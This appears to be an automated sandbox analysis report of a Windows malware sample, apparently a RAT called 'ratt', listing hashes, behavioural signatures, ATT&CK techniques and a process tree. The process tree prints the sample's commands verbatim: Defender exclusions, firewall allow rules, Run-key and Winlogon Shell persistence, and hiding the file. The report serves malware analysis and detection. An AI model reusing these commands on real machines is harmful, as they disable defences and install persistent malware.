96accf5cef1da7ad91e6f5ddd2c44c319a698959a9c3bf966300a55d5cd18301

Analysis

max time kernel
48s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
01/08/2023, 22:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

96accf5cef1da7ad91e6f5ddd2c44c319a698959a9c3bf966300a55d5cd18301.exe
Size

1.4MB
MD5

636180e2cdb6f7262d1f2c5202ca5752
SHA1

2edaececdb26ffd832305d219e341397b050f35f
SHA256

96accf5cef1da7ad91e6f5ddd2c44c319a698959a9c3bf966300a55d5cd18301
SHA512

c92867cac53096401cfd6db6310cf24472715149e13d8e3f69d5dc5065b9219aad1fb035afe5f02acbd33dbe773ca4798a465ec48461e36974bd0c9b6adf50fe
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
2080	netsh.exe
3020	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000600000002322e-236.dat	acprotect
behavioral1/files/0x000600000002322e-235.dat	acprotect

Executes dropped EXE 1 IoCs

pid	Process
4108	7z.exe

Loads dropped DLL 1 IoCs

pid	Process
4108	7z.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000002322f-232.dat	upx
behavioral1/files/0x000600000002322e-236.dat	upx
behavioral1/memory/4108-237-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/files/0x000600000002322e-235.dat	upx
behavioral1/files/0x000600000002322f-234.dat	upx
behavioral1/memory/4108-233-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/memory/4108-241-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3836	PING.EXE
1604	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1744	powershell.exe
1744	powershell.exe
4688	powershell.exe
4688	powershell.exe
2324	powershell.exe
2324	powershell.exe
4412	powershell.exe
4412	powershell.exe
3624	powershell.exe
3624	powershell.exe
1500	powershell.exe
1500	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2028	WMIC.exe
Token: SeSecurityPrivilege	2028	WMIC.exe
Token: SeTakeOwnershipPrivilege	2028	WMIC.exe
Token: SeLoadDriverPrivilege	2028	WMIC.exe
Token: SeSystemProfilePrivilege	2028	WMIC.exe
Token: SeSystemtimePrivilege	2028	WMIC.exe
Token: SeProfSingleProcessPrivilege	2028	WMIC.exe
Token: SeIncBasePriorityPrivilege	2028	WMIC.exe
Token: SeCreatePagefilePrivilege	2028	WMIC.exe
Token: SeBackupPrivilege	2028	WMIC.exe
Token: SeRestorePrivilege	2028	WMIC.exe
Token: SeShutdownPrivilege	2028	WMIC.exe
Token: SeDebugPrivilege	2028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2028	WMIC.exe
Token: SeRemoteShutdownPrivilege	2028	WMIC.exe
Token: SeUndockPrivilege	2028	WMIC.exe
Token: SeManageVolumePrivilege	2028	WMIC.exe
Token: 33	2028	WMIC.exe
Token: 34	2028	WMIC.exe
Token: 35	2028	WMIC.exe
Token: 36	2028	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2028	WMIC.exe
Token: SeSecurityPrivilege	2028	WMIC.exe
Token: SeTakeOwnershipPrivilege	2028	WMIC.exe
Token: SeLoadDriverPrivilege	2028	WMIC.exe
Token: SeSystemProfilePrivilege	2028	WMIC.exe
Token: SeSystemtimePrivilege	2028	WMIC.exe
Token: SeProfSingleProcessPrivilege	2028	WMIC.exe
Token: SeIncBasePriorityPrivilege	2028	WMIC.exe
Token: SeCreatePagefilePrivilege	2028	WMIC.exe
Token: SeBackupPrivilege	2028	WMIC.exe
Token: SeRestorePrivilege	2028	WMIC.exe
Token: SeShutdownPrivilege	2028	WMIC.exe
Token: SeDebugPrivilege	2028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2028	WMIC.exe
Token: SeRemoteShutdownPrivilege	2028	WMIC.exe
Token: SeUndockPrivilege	2028	WMIC.exe
Token: SeManageVolumePrivilege	2028	WMIC.exe
Token: 33	2028	WMIC.exe
Token: 34	2028	WMIC.exe
Token: 35	2028	WMIC.exe
Token: 36	2028	WMIC.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	WMIC.exe
Token: SeSecurityPrivilege	1972	WMIC.exe
Token: SeTakeOwnershipPrivilege	1972	WMIC.exe
Token: SeLoadDriverPrivilege	1972	WMIC.exe
Token: SeSystemProfilePrivilege	1972	WMIC.exe
Token: SeSystemtimePrivilege	1972	WMIC.exe
Token: SeProfSingleProcessPrivilege	1972	WMIC.exe
Token: SeIncBasePriorityPrivilege	1972	WMIC.exe
Token: SeCreatePagefilePrivilege	1972	WMIC.exe
Token: SeBackupPrivilege	1972	WMIC.exe
Token: SeRestorePrivilege	1972	WMIC.exe
Token: SeShutdownPrivilege	1972	WMIC.exe
Token: SeDebugPrivilege	1972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1972	WMIC.exe
Token: SeRemoteShutdownPrivilege	1972	WMIC.exe
Token: SeUndockPrivilege	1972	WMIC.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 3584 wrote to memory of 3832	3584	96accf5cef1da7ad91e6f5ddd2c44c319a698959a9c3bf966300a55d5cd18301.exe	87
PID 3584 wrote to memory of 3832	3584	96accf5cef1da7ad91e6f5ddd2c44c319a698959a9c3bf966300a55d5cd18301.exe	87
PID 3584 wrote to memory of 3832	3584	96accf5cef1da7ad91e6f5ddd2c44c319a698959a9c3bf966300a55d5cd18301.exe	87
PID 3832 wrote to memory of 1924	3832	cmd.exe	90
PID 3832 wrote to memory of 1924	3832	cmd.exe	90
PID 3832 wrote to memory of 1924	3832	cmd.exe	90
PID 1924 wrote to memory of 2788	1924	cmd.exe	91
PID 1924 wrote to memory of 2788	1924	cmd.exe	91
PID 1924 wrote to memory of 2788	1924	cmd.exe	91
PID 3832 wrote to memory of 1844	3832	cmd.exe	92
PID 3832 wrote to memory of 1844	3832	cmd.exe	92
PID 3832 wrote to memory of 1844	3832	cmd.exe	92
PID 1844 wrote to memory of 2028	1844	cmd.exe	93
PID 1844 wrote to memory of 2028	1844	cmd.exe	93
PID 1844 wrote to memory of 2028	1844	cmd.exe	93
PID 3832 wrote to memory of 1744	3832	cmd.exe	97
PID 3832 wrote to memory of 1744	3832	cmd.exe	97
PID 3832 wrote to memory of 1744	3832	cmd.exe	97
PID 3832 wrote to memory of 4688	3832	cmd.exe	99
PID 3832 wrote to memory of 4688	3832	cmd.exe	99
PID 3832 wrote to memory of 4688	3832	cmd.exe	99
PID 3832 wrote to memory of 2324	3832	cmd.exe	101
PID 3832 wrote to memory of 2324	3832	cmd.exe	101
PID 3832 wrote to memory of 2324	3832	cmd.exe	101
PID 3832 wrote to memory of 4412	3832	cmd.exe	102
PID 3832 wrote to memory of 4412	3832	cmd.exe	102
PID 3832 wrote to memory of 4412	3832	cmd.exe	102
PID 3832 wrote to memory of 3624	3832	cmd.exe	105
PID 3832 wrote to memory of 3624	3832	cmd.exe	105
PID 3832 wrote to memory of 3624	3832	cmd.exe	105
PID 3832 wrote to memory of 4108	3832	cmd.exe	106
PID 3832 wrote to memory of 4108	3832	cmd.exe	106
PID 3832 wrote to memory of 4108	3832	cmd.exe	106
PID 3832 wrote to memory of 1500	3832	cmd.exe	107
PID 3832 wrote to memory of 1500	3832	cmd.exe	107
PID 3832 wrote to memory of 1500	3832	cmd.exe	107
PID 1500 wrote to memory of 2080	1500	powershell.exe	110
PID 1500 wrote to memory of 2080	1500	powershell.exe	110
PID 1500 wrote to memory of 2080	1500	powershell.exe	110
PID 1500 wrote to memory of 3020	1500	powershell.exe	111
PID 1500 wrote to memory of 3020	1500	powershell.exe	111
PID 1500 wrote to memory of 3020	1500	powershell.exe	111
PID 1500 wrote to memory of 4556	1500	powershell.exe	112
PID 1500 wrote to memory of 4556	1500	powershell.exe	112
PID 1500 wrote to memory of 4556	1500	powershell.exe	112
PID 4556 wrote to memory of 1972	4556	cmd.exe	113
PID 4556 wrote to memory of 1972	4556	cmd.exe	113
PID 4556 wrote to memory of 1972	4556	cmd.exe	113
PID 1500 wrote to memory of 4400	1500	powershell.exe	114
PID 1500 wrote to memory of 4400	1500	powershell.exe	114
PID 1500 wrote to memory of 4400	1500	powershell.exe	114
PID 4400 wrote to memory of 3324	4400	cmd.exe	115
PID 4400 wrote to memory of 3324	4400	cmd.exe	115
PID 4400 wrote to memory of 3324	4400	cmd.exe	115

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1808	attrib.exe

C:\Users\Admin\AppData\Local\Temp\96accf5cef1da7ad91e6f5ddd2c44c319a698959a9c3bf966300a55d5cd18301.exe
"C:\Users\Admin\AppData\Local\Temp\96accf5cef1da7ad91e6f5ddd2c44c319a698959a9c3bf966300a55d5cd18301.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1924
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4688
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4412
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3624
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4108
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2080
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:3020
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4556
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="GBSDSUCH" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1972
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4400
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:3324
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      PID:4640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:2376
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 7
        6⤵
        Runs ping.exe
        
        PID:3836
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 11 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 11 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:3148
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 11
        6⤵
        Runs ping.exe
        
        PID:1604
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:1808
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    PID:4932
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    PID:2028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
679.3MB

MD5
11d2704c7567ae7d74285317e3fb26ac

SHA1
fd3494bb9f5f74d982874f273cf6aa21e11a28bb

SHA256
f57ac6cd924d7b0a4ca5b4e8a354764c4a1984c4f3b335e593b845f1576b2eee

SHA512
b49d5e50ff50f0faebfab6cd7bbe8ef67a232953c228696749a6298126235480d82583efa4df830239426fdbf82d48a9fc933d216dca004d619f1ba7b20ad9d6

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
108.1MB

MD5
eeb4ac835de340c291bf0e398cfe45f4

SHA1
8c603308ebfc9a56d94bda1a6a46d119f5dad543

SHA256
89572107d40115e010df67b0d08521feb946f5c566641adb995995702ade4c57

SHA512
6f34ae5efb8b9c5cddee5606d52bf5180b2246d34c4c89dd6fa24d6304e90744fb9534c86aa319d010502cd6a396b571bb2398dd0a8d2fc6d62ba09b87b7d2c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
ecf429c24e3b782456e4c6faff44f284

SHA1
2ee0a93438acfffb06f2d6504b072f4480862c60

SHA256
890bc8dc70db4c73ba949a8ee6a82af2ea23116de5a2ababa1decb462f76245c

SHA512
458c3a336c4645ba4884cff5c47209034fd9fc68d01c6055facfb7ca6d4df4099bc0be825165f5b34c0c1b63317ce73600f07d3802a56c2a9be839cee95fe9b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
e8d3bcdf21f36281d1e8f0c79153eb77

SHA1
dde91df55a50edc03cc79220e39f765046a3c603

SHA256
d9da62e9dda6727df9b50a393ff4803a4892d404db275727e94df4c363f7f5db

SHA512
d0d85ff1642d03a478e8c65068899d56fe627052f20488174bd5071651da4c6fe3bbec6a26fa78b9a56f5f2956da838a3b5116d12a279bc3c19b84cd182f493d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
3cb200c86df14fb3a0e563b5bf5d8dab

SHA1
6c9e51020cc30e181fa74f2da5b3f47e8aeec8eb

SHA256
37bdffb25bfef20919ef9726f4e871ae7c99cb105819bbf5385edea9eabf1023

SHA512
cb2505bf183be7b1a50a0f21d9bb1f8f7c7ad97cf626df3e920a8d3a744f802b51b542c0775b5b300245e3ed7c6782168a5774c214a31ffd901a0bd4071f68e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
9bbaec14b507108f1482da46e3ac7a3b

SHA1
07e06f98a7168f12754073bb975bd8a474e24cc4

SHA256
d80d83cb417564cd55763a09ac53ee6853f5946e56fc1166c3e45d8c5d07f323

SHA512
e281f97f90faf3cc17b6751e85ea584ff048c445a90d14276ce5d0ce308565d0680b9caf3bc625f2abe73991e229c1a460ec3253591246f5f406b9eea9735033

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
37ebf38a50557f8624b9278b226ace90

SHA1
c28a5d6eaf9ea4820c3e82d8af04e2e82bdacae1

SHA256
a25ec88744863742636b9349e72bb7b45e261464e10b24d03ad9571226148a58

SHA512
5d76c861725c4075042b0e898daf6dee6f2a056fb0c4ba71bc0aeba19e6d9a83b106d6ba969c42fdc09d67e1a881a7b233128d00ad68ed6e15d98e8dc46edb38

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_grqcc0s5.kqw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
745.1MB

MD5
be788bb3680cf3809d9678ee6f7ba321

SHA1
499f01d5f654f83e172004dcc03f99abdd251734

SHA256
03a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b

SHA512
83c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
53.3MB

MD5
34043cc946fd5d236bcb7bf5ab096172

SHA1
c7f2be235857e4d88133f2ef63c15d076937acfc

SHA256
6459b0c5c0793eaaa3830af145fa67fad3e990f9ae091d6482a088dd4b0089ff

SHA512
136872971cd75dbb1e41a693b6aea3609194a5f63d4015a3d30a613ae7cba2a4b6212d2ab301bee194c8c2b588177014c5a97ffc73587b91566924fb3e96bccf

Download Submit
memory/1500-278-0x00000000048F0000-0x0000000004900000-memory.dmp

Filesize
64KB

Download
memory/1500-245-0x0000000074430000-0x0000000074BE0000-memory.dmp

Filesize
7.7MB

Download
memory/1500-298-0x0000000074430000-0x0000000074BE0000-memory.dmp

Filesize
7.7MB

Download
memory/1500-285-0x0000000008280000-0x0000000008824000-memory.dmp

Filesize
5.6MB

Download
memory/1500-284-0x00000000073B0000-0x00000000073D2000-memory.dmp

Filesize
136KB

Download
memory/1500-282-0x00000000048F0000-0x0000000004900000-memory.dmp

Filesize
64KB

Download
memory/1500-281-0x0000000007270000-0x0000000007278000-memory.dmp

Filesize
32KB

Download
memory/1500-280-0x0000000007340000-0x000000000735A000-memory.dmp

Filesize
104KB

Download
memory/1500-279-0x0000000007220000-0x000000000722E000-memory.dmp

Filesize
56KB

Download
memory/1500-277-0x00000000072A0000-0x0000000007336000-memory.dmp

Filesize
600KB

Download
memory/1500-276-0x00000000048F0000-0x0000000004900000-memory.dmp

Filesize
64KB

Download
memory/1500-275-0x0000000007070000-0x000000000707A000-memory.dmp

Filesize
40KB

Download
memory/1500-274-0x0000000074430000-0x0000000074BE0000-memory.dmp

Filesize
7.7MB

Download
memory/1500-273-0x0000000007010000-0x000000000702A000-memory.dmp

Filesize
104KB

Download
memory/1500-272-0x0000000007650000-0x0000000007CCA000-memory.dmp

Filesize
6.5MB

Download
memory/1500-271-0x00000000062B0000-0x00000000062CE000-memory.dmp

Filesize
120KB

Download
memory/1500-261-0x0000000070250000-0x000000007029C000-memory.dmp

Filesize
304KB

Download
memory/1500-260-0x00000000062D0000-0x0000000006302000-memory.dmp

Filesize
200KB

Download
memory/1500-259-0x00000000048F0000-0x0000000004900000-memory.dmp

Filesize
64KB

Download
memory/1500-246-0x00000000048F0000-0x0000000004900000-memory.dmp

Filesize
64KB

Download
memory/1500-247-0x00000000048F0000-0x0000000004900000-memory.dmp

Filesize
64KB

Download
memory/1744-148-0x0000000003340000-0x0000000003376000-memory.dmp

Filesize
216KB

Download
memory/1744-151-0x0000000006260000-0x00000000062C6000-memory.dmp

Filesize
408KB

Download
memory/1744-147-0x00000000033F0000-0x0000000003400000-memory.dmp

Filesize
64KB

Download
memory/1744-162-0x0000000006930000-0x000000000694E000-memory.dmp

Filesize
120KB

Download
memory/1744-149-0x0000000005A40000-0x0000000006068000-memory.dmp

Filesize
6.2MB

Download
memory/1744-152-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/1744-166-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/1744-163-0x00000000033F0000-0x0000000003400000-memory.dmp

Filesize
64KB

Download
memory/1744-150-0x0000000005960000-0x0000000005982000-memory.dmp

Filesize
136KB

Download
memory/1744-146-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2028-309-0x00000000055F0000-0x0000000005600000-memory.dmp

Filesize
64KB

Download
memory/2028-307-0x0000000000640000-0x00000000007F6000-memory.dmp

Filesize
1.7MB

Download
memory/2028-306-0x0000000074430000-0x0000000074BE0000-memory.dmp

Filesize
7.7MB

Download
memory/2324-186-0x0000000004A70000-0x0000000004A80000-memory.dmp

Filesize
64KB

Download
memory/2324-197-0x0000000004A70000-0x0000000004A80000-memory.dmp

Filesize
64KB

Download
memory/2324-185-0x0000000004A70000-0x0000000004A80000-memory.dmp

Filesize
64KB

Download
memory/2324-199-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/2324-184-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/3624-217-0x0000000004EF0000-0x0000000004F00000-memory.dmp

Filesize
64KB

Download
memory/3624-216-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/3624-228-0x0000000004EF0000-0x0000000004F00000-memory.dmp

Filesize
64KB

Download
memory/3624-230-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/4108-237-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/4108-241-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/4108-233-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/4412-214-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
